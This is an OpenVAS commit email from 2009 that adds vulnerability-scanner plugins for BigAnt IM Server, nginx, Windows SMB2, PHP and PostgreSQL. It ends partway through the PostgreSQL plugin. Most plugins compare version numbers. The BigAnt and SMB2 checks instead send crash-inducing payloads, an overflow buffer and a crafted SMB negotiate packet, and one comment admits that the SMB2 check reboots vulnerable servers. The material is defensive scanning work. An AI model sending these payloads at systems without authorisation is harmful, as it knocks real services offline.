[Openvas-commits] r5349 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Oct 1 18:57:34 CEST 2009


Author: mime
Date: 2009-10-01 18:57:31 +0200 (Thu, 01 Oct 2009)
New Revision: 5349

Added:
   trunk/openvas-plugins/scripts/BigAnt_36407.nasl
   trunk/openvas-plugins/scripts/BigAnt_detect.nasl
   trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
   trunk/openvas-plugins/scripts/nginx_36384.nasl
   trunk/openvas-plugins/scripts/nginx_36438.nasl
   trunk/openvas-plugins/scripts/nginx_36490.nasl
   trunk/openvas-plugins/scripts/nginx_detect.nasl
   trunk/openvas-plugins/scripts/php_restriction_bypass.nasl
   trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl
   trunk/openvas-plugins/scripts/warftpd_20944.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/cve_current.txt
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/ChangeLog	2009-10-01 16:57:31 UTC (rev 5349)
@@ -1,3 +1,17 @@
+2009-10-01  Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/BigAnt_36407.nasl,
+	scripts/warftpd_20944.nasl,
+	scripts/nginx_36384.nasl,
+	scripts/postgreSQL_multiple_security_vulnerabilities.nasl,
+	scripts/nginx_detect.nasl,
+	scripts/nginx_36438.nasl,
+	scripts/ms_smb2_highid.nasl,
+	scripts/BigAnt_detect.nasl,
+	scripts/php_restriction_bypass.nasl,
+	scripts/nginx_36490.nasl:
+	Added new plugins.
+
 2009-10-01  Chandrashekhar B <bchandra at secpod.com>
 
 	* scripts/secpod_an_image_gallery_xss_vuln.nasl,

Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/cve_current.txt	2009-10-01 16:57:31 UTC (rev 5349)
@@ -88,4 +88,14 @@
 CVE-2009-3473			SecPod
 CVE-2009-3472 			SecPod
 CVE-2009-3478 			SecPod
-
+36407                           Greenbone       svn             R
+CVE-2006-5789                   Greenbone       svn             R
+CVE-2009-2629                   Greenbone       svn             R
+CVE-2009-3229                   Greenbone       svn             R
+CVE-2009-3230                   Greenbone       svn             R
+CVE-2009-3231                   Greenbone       svn             R
+36438                           Greenbone       svn             R
+36555                           Greenbone       svn             R
+36554                           Greenbone       svn             R
+36490                           Greenbone       svn             R
+CVE-2009-3103                   Greenbone       svn             R

Added: trunk/openvas-plugins/scripts/BigAnt_36407.nasl
===================================================================
--- trunk/openvas-plugins/scripts/BigAnt_36407.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/BigAnt_36407.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100278);
+ script_bugtraq_id(36407);
+ script_version ("1.0-$Revision$");
+
+ script_name("BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability");
+
+desc = "Overview:
+BigAnt IM Server is prone to a remote buffer-overflow vulnerability
+because it fails to perform adequate boundary checks on user-
+supplied input.
+
+An attacker can exploit this issue to execute arbitrary code with the
+privileges of the user running the server. Failed exploit attempts
+will result in a denial-of-service condition.
+
+BigAnt IM Server 2.50 is vulnerable; other versions may also be
+affected.
+
+NOTE: This issue may be related to the vulnerability described in BID
+      28795 (BigAnt IM Server HTTP GET Request Remote Buffer Overflow
+      Vulnerability). We will update or retire this BID if further
+      analysis or reports reveal that the two records represent the
+      same vulnerability.
+
+Solution:
+Updates are available. Please contact the vendor for details.
+
+References:
+http://www.securityfocus.com/bid/36407
+http://www.bigantsoft.com
+
+Risk factor : High";
+
+ script_description(desc);
+ script_summary("Determine if BigAnt IM Server is prone to a remote buffer-overflow vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Buffer overflow");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","BigAnt_detect.nasl");
+ script_require_ports("Services/BigAnt", 6660);
+ exit(0);
+}
+
+include("http_func.inc");
+
+if(safe_checks())exit(0);
+
+#port = get_kb_item("Services/BigAnt");
+port = 6660;
+if(!port)exit(0);
+if(!get_port_state(port))exit(0);
+
+payload =  crap(data:raw_string(0x41), length: 985);
+payload += raw_string(0xeb,0x06,0x90,0x90,0x6a,0x19,0x9a,0x0f);
+payload += crap(data:raw_string(0x90),length: 10);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+req = string("GET ", payload, "\r\n\r\n"); 
+send(socket:soc, data:req);
+if(http_is_dead(port: port)) {
+    security_hole(port:port);
+    exit(0); 
+}	
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/BigAnt_36407.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/BigAnt_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/BigAnt_detect.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/BigAnt_detect.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,71 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# BigAnt IM Server Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100280);
+ script_version ("1.0-$Revision$");
+
+ script_name("BigAnt IM Server Detection");
+
+ desc = "Overview:
+This host is running BigAnt IM Server, a instant messaging solution
+for enterprise.
+
+See also:
+http://www.bigantsoft.com/
+
+Risk factor : None";
+
+ script_description(desc);
+ script_summary("Checks for the presence of BigAnt IM Server");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ exit(0);
+}
+
+include("http_func.inc");
+include("global_settings.inc");
+include("misc_func.inc");
+
+port = get_http_port(default:6660);
+if(!get_port_state(port))exit(0);
+
+banner = get_http_banner(port: port);
+if(!banner)exit(0);
+
+if(egrep(pattern:"AntServer", string:banner))
+ {
+  register_service(port:port, ipproto:"tcp", proto:"BigAnt");
+  if(report_verbosity > 0) {
+   security_note(port:port);
+  }
+ }
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/BigAnt_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ms_smb2_highid.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/ms_smb2_highid.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,121 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100283);
+ script_bugtraq_id(36299);
+ script_cve_id("CVE-2009-3103");
+ script_version ("1.0-$Revision$");
+
+ script_name("Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability");
+
+desc = "Overview:
+Microsoft Windows is prone to a remote code-execution vulnerability
+when processing the protocol headers for the Server Message Block
+(SMB) Negotiate Protocol Request.
+
+NOTE: Reportedly, for this issue to be exploitable, file sharing must
+      be enabled.
+
+An attacker can exploit this issue to execute code with SYSTEM-level
+privileges; failed exploit attempts will likely cause denial-of-
+service conditions.
+
+Windows 7 RC, Vista and 2008 Server are vulnerable; other versions may
+also be affected.
+
+NOTE: Reportedly, Windows XP and 2000 are not affected.
+
+UPDATE (September 9, 2009): Symantec has confirmed the issue on
+Windows Vista SP1 and Windows Server 2008.
+
+i
+References:
+http://www.securityfocus.com/bid/36299
+http://blog.48bits.com/?p=510#more-510
+http://www.microsoft.com/technet/security/advisory/975497.mspx
+http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
+http://www.microsoft.com/windows/windows-7/
+http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1
+http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx
+http://www.microsoft.com/windows/products/windowsvista/default.mspx
+http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html
+http://www.securityfocus.com/archive/1/506300
+http://www.securityfocus.com/archive/1/506327
+http://www.kb.cert.org/vuls/id/135940
+
+Risk factor : High";
+
+ script_description(desc);
+ script_summary("Determine if Microsoft Windows is prone to a remote code-execution vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Windows");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "smtpserver_detect.nasl");
+ script_require_ports(445);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("network_func.inc");
+
+if(safe_checks())exit(0);
+
+port = 445;
+if(!get_port_state(port))exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+data = raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x53,0xc8,
+                  0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xfe,
+                  0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,
+                  0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,
+                  0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,
+                  0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,
+                  0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,
+                  0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4e,0x54,
+                  0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x32,0x2e,
+                  0x30,0x30,0x32,0x00); # Tested against 2008 Server. A vulnerable Server doing a reboot. I'm not happy with that, but a the moment i have no idea how to detect this vulnerability without exploiting it.
+
+send(socket: soc, data: data);
+close(soc);
+
+sleep(2);
+
+soc1 = open_sock_tcp(port);
+
+ if(!soc1) {
+   security_hole(port:port);
+   exit(0);
+ } else {
+   close(soc1);
+ }
+
+exit(0);
+
+  


Property changes on: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/nginx_36384.nasl
===================================================================
--- trunk/openvas-plugins/scripts/nginx_36384.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/nginx_36384.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# nginx HTTP Request Remote Buffer Overflow Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100276);
+ script_bugtraq_id(36384);
+ script_cve_id("CVE-2009-2629");
+ script_version ("1.0-$Revision$");
+
+ script_name("nginx HTTP Request Remote Buffer Overflow Vulnerability");
+
+desc = "Overview:
+The 'nginx' program is prone to a buffer-overflow vulnerability
+because the application fails to perform adequate boundary checks on
+user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code within the
+context of the affected application. Failed exploit attempts will
+result in a denial-of-service condition.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/36384
+http://nginx.net/CHANGES-0.5
+http://nginx.net/CHANGES-0.6
+http://nginx.net/CHANGES-0.7
+http://nginx.net/CHANGES
+http://nginx.net/
+http://www.kb.cert.org/vuls/id/180065
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if nginx is prone to a buffer-overflow vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("nginx_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0);
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if(
+     version_is_less(version: vers, test_version:"0.5.38")                      ||
+     version_in_range(version:vers, test_version:"0.6", test_version2:"0.6.38") ||
+     version_in_range(version:vers, test_version:"0.7", test_version2:"0.7.61") ||
+     version_in_range(version:vers, test_version:"0.8", test_version2:"0.8.14")
+    ) {
+
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);     


Property changes on: trunk/openvas-plugins/scripts/nginx_36384.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/nginx_36438.nasl
===================================================================
--- trunk/openvas-plugins/scripts/nginx_36438.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/nginx_36438.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# nginx Proxy DNS Cache Domain Spoofing Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100277);
+ script_bugtraq_id(36438);
+ script_version ("1.0-$Revision$");
+
+ script_name("nginx Proxy DNS Cache Domain Spoofing Vulnerability");
+
+desc = "Overview:
+The 'nginx' program is prone to a vulnerability that may allow
+attackers to spoof domains because the software fails to properly
+compare domains when referencing an internal DNS cache.
+
+This issue can be exploited when nginx is configured to act as a
+forward proxy, but this is a nonstandard and unsupported
+configuration. Attacks against other configurations may also be
+possible.
+
+Successful exploits may allow remote attackers to intercept traffic
+intended for legitimate websites, which may aid in further attacks.
+
+References:
+http://www.securityfocus.com/bid/36438
+http://nginx.net/
+http://www.securityfocus.com/archive/1/506541
+http://www.securityfocus.com/archive/1/506543
+
+Risk factor : Low";
+
+ script_description(desc);
+ script_summary("Determine if nginx is prone to a Proxy DNS Cache Domain Spoofing Vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("nginx_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0);
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if(
+      version_in_range(version:vers, test_version:"0.8", test_version2:"0.8.15") ||
+      version_in_range(version:vers, test_version:"0.7", test_version2:"0.7.62") || 
+      version_in_range(version:vers, test_version:"0.6", test_version2:"0.6.39") ||
+      version_in_range(version:vers, test_version:"0.5", test_version2:"0.5.38") 
+    ) {
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/nginx_36438.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/nginx_36490.nasl
===================================================================
--- trunk/openvas-plugins/scripts/nginx_36490.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/nginx_36490.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# nginx WebDAV Multiple Directory Traversal Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100275);
+ script_bugtraq_id(36490);
+ script_version ("1.0-$Revision$");
+
+ script_name("nginx WebDAV Multiple Directory Traversal Vulnerabilities");
+
+desc = "Overview:
+The 'nginx' program is prone to multiple directory-traversal
+vulnerabilities because the software fails to sufficiently sanitize
+user-supplied input.
+
+An attacker can exploit these issues using directory-traversal strings
+('../') to overwrite arbitrary files outside the root directory.
+
+These issues affect nginx 0.7.61 and 0.7.62; other versions may also
+be affected.
+
+References:
+http://www.securityfocus.com/bid/36490
+http://nginx.net/
+http://www.securityfocus.com/archive/1/506662
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if nginx Version is 0.7.61 ot 0.7.62");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("nginx_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+     
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0);
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if(
+     version_is_equal(version: vers, test_version: "0.7.61") ||
+     version_is_equal(version: vers, test_version: "0.7.62")
+    ) {
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/nginx_36490.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/nginx_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/nginx_detect.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/nginx_detect.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# nginx Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running nginx. nginx [engine x] is a HTTP server and mail
+proxy server written by Igor Sysoev. 
+
+See also:
+http://nginx.net/
+
+Risk factor : None";
+
+if (description)
+{
+ script_id(100274);
+ script_version ("1.0-$Revision$");
+ script_name("nginx Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of nginx");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+ buf = get_http_banner(port: port);
+ if(!buf)exit(0);
+
+ if(egrep(pattern:"Server: nginx/" , string: buf, icase: TRUE))
+ {
+    vers = string("unknown");
+    ### try to get version 
+    version = eregmatch(string: buf, pattern: "Server: nginx/([0-9.]+)",icase:TRUE);
+
+    if ( !isnull(version[1]) ) {
+       vers=chomp(version[1]);
+    }
+
+    set_kb_item(name: string("nginx/", port, "/version"), value: string(vers));
+
+    info = string("None\n\nnginx Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host.");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"None$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/nginx_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/php_restriction_bypass.nasl
===================================================================
--- trunk/openvas-plugins/scripts/php_restriction_bypass.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/php_restriction_bypass.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,94 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP multiple Restriction-Bypass Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100281);
+ script_bugtraq_id(36555,36554);
+ script_version ("1.0-$Revision$");
+
+ script_name("PHP multiple Restriction-Bypass Vulnerabilities");
+
+desc = "Overview:
+PHP is prone to a 'safe_mode' and to a 'open_basedir'
+restriction-bypass vulnerability. Successful exploits could allow an
+attacker to access files in unauthorized locations or create files in
+any writable directory and in unauthorized locations.
+
+This vulnerability would be an issue in shared-hosting configurations
+where multiple users can create and execute arbitrary PHP script code;
+the 'safe_mode' and the 'open_basedir' restrictions are assumed to
+isolate users from each other.
+
+PHP 5.2.11 and 5.3.0 are vulnerable; other versions may also be
+affected.
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/36555
+http://www.securityfocus.com/bid/36554
+http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/standard/file.c?view=log
+http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/standard/file.c?view=log
+http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/posix/posix.c?view=log
+http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/posix/posix.c?view=log
+http://securityreason.com/securityalert/6601
+http://securityreason.com/securityalert/6600
+http://www.php.net
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if php version is 5.3.0 or 5.2.11");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("gb_php_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("version_func.inc");
+
+phpPort = get_kb_item("Services/www");
+if(!phpPort){
+  exit(0);
+}
+
+phpVer = get_kb_item("www/" + phpPort + "/PHP");
+if(!phpVer){
+  exit(0);
+}
+
+if(version_is_equal(version:phpVer, test_version:"5.2.11") ||
+   version_is_equal(version:phpVer, test_version:"5.3.0")) {
+
+   security_warning(port:phpPort);
+   exit(0);
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/php_restriction_bypass.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl
===================================================================
--- trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PostgreSQL Multiple Security Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100273);
+ script_bugtraq_id(36314);
+ script_cve_id("CVE-2009-3229","CVE-2009-3230","CVE-2009-3231");
+ script_version ("1.0-$Revision$");
+
+ script_name("PostgreSQL Multiple Security Vulnerabilities");
+
+desc = "Overview:
+PostgreSQL is prone to multiple security vulnerabilities, including a
+denial-of-service issue, a privilege-escalation issue, and an authentication-
+bypass issue.
+
+Attackers can exploit these issues to shut down affected servers,
+perform certain actions with elevated privileges, and bypass
+authentication mechanisms to perform unauthorized actions. Other
+attacks may also be possible.
+
+
+Solution:
+Updates are available. Please see the references for more information.
+
+
+References:
+http://www.securityfocus.com/bid/36314
+https://bugzilla.redhat.com/show_bug.cgi?id=522085#c1
+http://www.postgresql.org/
+http://www.postgresql.org/support/security
+http://permalink.gmane.org/gmane.comp.security.oss.general/2088
+
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if PostgreSQL is prone to multiple security vulnerabilities");
+ script_category(ACT_GATHER_INFO);
+ script_family("Databases");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("postgresql_detect.nasl");
+ script_require_ports("Services/postgresql", 5432);
+ exit(0);
